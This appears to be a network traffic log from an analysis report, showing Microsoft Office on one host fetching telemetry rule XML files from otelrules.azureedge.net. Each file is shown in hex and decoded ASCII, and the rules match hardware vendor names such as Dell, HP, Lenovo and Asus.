2024-11-02 16:56:23 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.7	49703	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:23 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:23 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:23 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: dcc6854f-e01e-0051-7b03-2d84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165623Z-15869dbbcc6tjwwhhC1DFWt1ns00000000ug000000003f3g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-02 16:56:23 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.7	49702	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:23 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:23 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:23 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 6c806435-001e-000b-642e-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165623Z-r159446fcd7lglgmhC1DFW5hnn00000001w00000000075zw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:23 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.7	49708	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:24 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:24 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 6074db47-b01e-0002-3124-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165624Z-r159446fcd7b9q82hC1DFWp8rw00000001t0000000006x52 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:24 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.7	49706	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:24 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:24 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: ee786005-101e-0065-140e-2d4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165624Z-16547b76f7fmbrhqhC1DFWkds80000000120000000000qsz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:24 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.7	49709	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:24 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:24 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165624Z-16547b76f7f7lhvnhC1DFWa2k000000000t000000000dpkr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:24 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.7	49710	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:24 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:24 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 9d3e471b-201e-006e-1b10-2cbbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165624Z-176bd8f9bc56w2rshC1DFWd88n00000002t0000000003b7e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:24 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.7	49711	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:25 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:26 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 718751ec-501e-0078-1528-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165625Z-176bd8f9bc5kp2ljhC1DFW54h0000000024000000000d247 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:26 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.7	49712	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:25 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:26 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 12e51ca0-101e-000b-3c00-2c5e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165626Z-176bd8f9bc5kp2ljhC1DFW54h0000000023000000000e6zu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:26 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.7	49713	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:25 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:25 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:25 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: b20ee4a1-601e-0050-660a-2c2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165625Z-176bd8f9bc5nsp7rhC1DFWgzkc00000001w0000000005101 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:25 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.7	49714	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:25 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:25 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: ab97492c-801e-007b-8024-2ce7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165625Z-r159446fcd78bmpqhC1DFW53gw00000001yg000000001yy4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:26 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.7	49707	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:26 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:26 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 002cc246-201e-003f-0a51-2c6d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165626Z-r159446fcd72jcvrhC1DFWv4xg00000001u000000000bwf1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:26 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.7	49715	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:26 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
